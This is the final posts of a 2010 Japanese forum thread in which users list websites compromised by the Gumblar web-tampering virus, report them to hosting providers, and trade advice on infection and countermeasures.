URLリンク(www.marielouise-cosme)<)●com/
化粧品の宣伝
URLリンク(mesia.nicestyle)<)●jp/link/ リンク先も
ホスト丸ごと?
URLリンク(54.hou-hou)<)●com/
URLリンク(kaden.hou-hou)●com/
とか。
化粧品の宣伝多いね
960:名無しさん@お腹いっぱい。
10/01/18 23:21:25
>>952
おつー
どんどん増えてるねー 国が関わってるのかしらw
961:名無しさん@お腹いっぱい。
10/01/18 23:22:59
乙
962:名無しさん@お腹いっぱい。
10/01/18 23:29:13
通報のテンプレとか作れば便利じゃないの
これからどんどん増えていきそうだし
963:名無しさん@お腹いっぱい。
10/01/18 23:32:37
>>960
民主がやりそうなこったな
964:名無しさん@お腹いっぱい。
10/01/18 23:32:56
ひどいなー
鯖管何しとんのやー
首だ首
965:名無しさん@お腹いっぱい。
10/01/18 23:46:02
メールでの連絡先やメールフォームの無いサイトは
ブラウザから送信できるFAXとかで連絡しないと駄目かな
966:名無しさん@お腹いっぱい。
10/01/18 23:48:09
>>965
本人にいってもろくに通じない
レンタルサーバならレンタル元のが確実で楽
967:名無しさん@お腹いっぱい。
10/01/18 23:55:39
>>966
個人ブログとかもで連絡先・メールアドレス無い場合はサーバの方にメールすればいいの?
貴重なご意見ありがとうございます的なテンプレメールすら来ないってイメージがある
968:名無しさん@お腹いっぱい。
10/01/18 23:58:24
ブログって感染するか?
969:名無しさん@お腹いっぱい。
10/01/19 00:00:40
この変種は今のところ目立った発病がないからじゃないか
3大対策ソフトも後追い状況で自称IT専門家みたいな人は全然気づいてない
感染だけが進行して行く
970:名無しさん@お腹いっぱい。
10/01/19 00:00:41
JavaとJavaScript切った状態で見ても感染するの?
971:名無しさん@お腹いっぱい。
10/01/19 00:00:56
>>967
ブログがどっかのサービスのものならそこのサービス元に連絡すれば
対応してくれるよ
平日昼間のみだろうけど
972:名無しさん@お腹いっぱい。
10/01/19 00:10:13
>>971
そうなんだ。ありがと。
973:名無しさん@お腹いっぱい。
10/01/19 00:24:34
>>968
htmlを弄れてFTPが使えるとこはやられる可能性がある
974:名無しさん@お腹いっぱい。
10/01/19 00:34:35
「完璧」に穴が空いてる対策方法w
URLリンク(blog.ecstudio.jp)
こういう間違った記事を書いてるとこにも凸※したほうが良いのかな?
975:名無しさん@お腹いっぱい。
10/01/19 00:36:51
>>954の
トレンドマイクロ社 オンラインスキャンで駆除出来るもんなの?
976:名無しさん@お腹いっぱい。
10/01/19 00:37:08
>>959
3番目ホスト丸ごとにゃ /index.php
済
www●marielouise-cosme●jp
www●askulnet●com
977:名無しさん@お腹いっぱい。
10/01/19 00:55:56
同人系の会社?
www●runandgun●co●jp
978:名無しさん@お腹いっぱい。
10/01/19 01:00:50
>>976
乙です
979:名無しさん@お腹いっぱい。
10/01/19 01:18:24
>>959
済
mesia●nicestyle●org める
abi●velvet●jp ろりぽ リンク先は見なかった(ry
980:名無しさん@お腹いっぱい。
10/01/19 01:29:27
>>959
hou-hou●com さくら
981:名無しさん@お腹いっぱい。
10/01/19 01:33:59
予想
「改竄する→このスレで報告」
982:名無しさん@お腹いっぱい。
10/01/19 01:36:32
>>977
www●runandgun●co●jp める
983:名無しさん@お腹いっぱい。
10/01/19 01:39:44 BE:2515182-2BP(1236)
通報先
ろりぽ
URLリンク(lolipop.jp)
さくら
URLリンク(secure.sakura.ad.jp)
984:名無しさん@お腹いっぱい。
10/01/19 01:50:38
ここの人たちってウィルスを各セキュリティ会社に送ってくれてるのかな?
985:名無しさん@お腹いっぱい。
10/01/19 03:21:05
全てかどうかは分からんがメジャーなところには送ってるんじゃないか
986:名無しさん@お腹いっぱい。
10/01/19 03:32:41
>>872
ナイスw
987:名無しさん@お腹いっぱい。
10/01/19 03:35:08
あわてるこたない
988:名無しさん@お腹いっぱい。
10/01/19 05:36:45
>>974
親切なら一言言ったほうがいいかと
989:名無しさん@お腹いっぱい。
10/01/19 09:04:40
八時のNHKニュースでgunblarのことやってたけど、対策とかいい加減で歯がゆい。
もっと訴求力のある訴え方をしないとどうにもならない。
990:名無しさん@お腹いっぱい。
10/01/19 09:13:56
>>989
gumblar な
991:名無しさん@お腹いっぱい。
10/01/19 10:32:49
>>989
TVで初めて知る程度の人にここのようなことを言っても理解できないよ。
992:名無しさん@お腹いっぱい。
10/01/19 10:55:31
スレリンク(sec板)l50
993:名無しさん@お腹いっぱい。
10/01/19 10:58:10
>>992
スレリンク(sec板)l50
まずこっちだろ
994:名無しさん@お腹いっぱい。
10/01/19 11:00:20
何で重複?
995:名無しさん@お腹いっぱい。
10/01/19 11:11:22
992は18日に立ってるのに
何で993を19日に立ててるんだ?
996:名無しさん@お腹いっぱい。
10/01/19 11:18:41
逆だろ
992が19日で993が18日
997:名無しさん@お腹いっぱい。
10/01/19 11:38:41
>>992
こういう奴がガンブラーなんかに引っかかるんだろうなw
998:名無しさん@お腹いっぱい。
10/01/19 11:51:44
混乱中ならともかくスレ立て宣言もあってアドレスも貼られてるのに重複とか
999:名無しさん@お腹いっぱい。
10/01/19 12:03:30
次スレ↓
【Gumblar/GENO】Web改竄ウイルス総合スレ3【8080】
スレリンク(sec板)
1000:名無しさん@お腹いっぱい。
10/01/19 12:08:33
1000
1001:1001
Over 1000 Thread
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。